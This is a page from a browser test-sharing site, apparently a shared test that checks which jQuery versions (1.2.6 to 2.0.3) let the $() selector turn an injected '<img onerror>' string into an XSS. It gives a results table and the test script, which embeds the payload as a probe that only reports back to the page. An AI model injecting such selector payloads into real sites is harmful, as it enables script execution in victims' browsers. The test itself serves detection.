Test

Test

By
infosec_n00b 0 Seen 117 times
Tags
JqueryXSS
Run this test now.

Results


Tested on
Chrome - 64 - Windows 10
jQuery VersionIs it Vulnerable?
jQuery 1.10.2Safe
jQuery 2.0.3Safe
jQuery 2.0.2Safe
jQuery 2.0.0Safe
jQuery 1.10.1Safe
jQuery 1.10.0Safe
jQuery 1.9.1Safe
jQuery 1.9.0Safe
jQuery 2.0.1Safe
1.2.14Some Error Occured
jQuery 1.8.3Vulnerable
jQuery 1.8.2Vulnerable
jQuery 1.6.3Vulnerable
jQuery 1.6.1Vulnerable
jQuery 1.7.1Vulnerable
jQuery 1.8.0Vulnerable
jQuery 1.6.2Vulnerable
jQuery 1.8.1Vulnerable
jQuery 1.5.1Safe
jQuery 1.7.2Vulnerable
jQuery 1.7.0Vulnerable
jQuery 1.6.4Vulnerable
jQuery 1.3.2Vulnerable
jQuery 1.5.0Vulnerable
jQuery 1.4.4Vulnerable
jQuery 1.5.2Vulnerable
jQuery 1.4.0Vulnerable
jQuery 1.6.0Vulnerable
jQuery 1.4.2Vulnerable
jQuery 1.4.1Vulnerable
jQuery 1.3.1Vulnerable
jQuery 1.3.0Vulnerable
jQuery 1.2.6Vulnerable
jQuery 1.4.3Vulnerable

User Script (ENUM_FUNCTION)

					
// Custom Functions
var jQuery_version = '';
function vulnerable(){
    addError('jQuery '+ jQuery_version, '<b>Vulnerable</b>');
}

function safe(){
    addSuccess('jQuery '+ jQuery_version, 'Safe');
}
    
function removeIframe(){
    var x = document.getElementById('jQueryFrameID');
    x.parentNode.removeChild(x);
}

// Test Function
function test(data){
	// We need to separate properties and access one by one.
try{
    jQuery_version = data;
    var jQueryFrame = document.createElement('iframe');
    jQueryFrame.id = 'jQueryFrameID';
    jQueryFrame.onload = function(){
            var jQueryScript = jQueryFrame.contentWindow.document.createElement('script');
            jQueryScript.type = 'text/javascript';
            jQueryScript.src = 'https://ajax.googleapis.com/ajax/libs/jquery/'+ data.toString() +'/jquery.min.js';
            jQueryFrame.contentWindow.document.body.appendChild(jQueryScript);
            jQueryScript.onload = function(){
                var exploitScript = "try{function bad(){parent.vulnerable(); parent.removeIframe();} $('. <img src=x onerror=bad();>');} catch(err){parent.safe();parent.removeIframe();}";
                var exploit = jQueryFrame.contentWindow.document.createElement('script');
                exploit.type = 'text/javascript';
                exploit.innerHTML = exploitScript;
                jQueryFrame.contentWindow.document.body.appendChild(exploit);
                
            };
            jQueryScript.onerror = function(){
                addResult(data ,  'Some Error Occured');
            }
    };
    document.body.appendChild(jQueryFrame);

}

catch(err){
	addInfo(data ,  'Some Error Occured');
}

}
					
				
					
				

Enum Data (ENUM_FUNCTION)

					
// Taken from jQuery Versions Under, https://developers.google.com/speed/libraries/devguide#jquery
var data = ['2.0.3','1.2.14', '2.0.2', '2.0.1', '2.0.0', '1.10.2', '1.10.1', 
'1.10.0', '1.9.1', '1.9.0', '1.8.3', '1.8.2', '1.8.1', '1.8.0', 
'1.7.2', '1.7.1', '1.7.0', '1.6.4', '1.6.3', '1.6.2', '1.6.1', 
'1.6.0', '1.5.2', '1.5.1', '1.5.0', '1.4.4', '1.4.3', '1.4.2', 
'1.4.1', '1.4.0', '1.3.2', '1.3.1', '1.3.0', '1.2.6', '1.2.3'];